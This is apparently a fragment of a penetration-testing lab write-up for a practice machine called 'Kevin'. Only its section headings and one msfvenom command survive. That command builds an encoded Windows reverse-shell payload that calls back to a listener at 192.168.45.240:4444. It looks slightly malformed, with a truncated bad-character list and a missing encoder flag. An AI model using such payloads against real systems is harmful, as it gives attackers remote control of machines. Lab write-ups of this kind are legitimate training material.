Kevin
Enumeration & Reconnaissance
Gaining Initial Access


Exploitation


Privilege Escalation
Lessons Learned
Last updated




Last updated
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.240 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python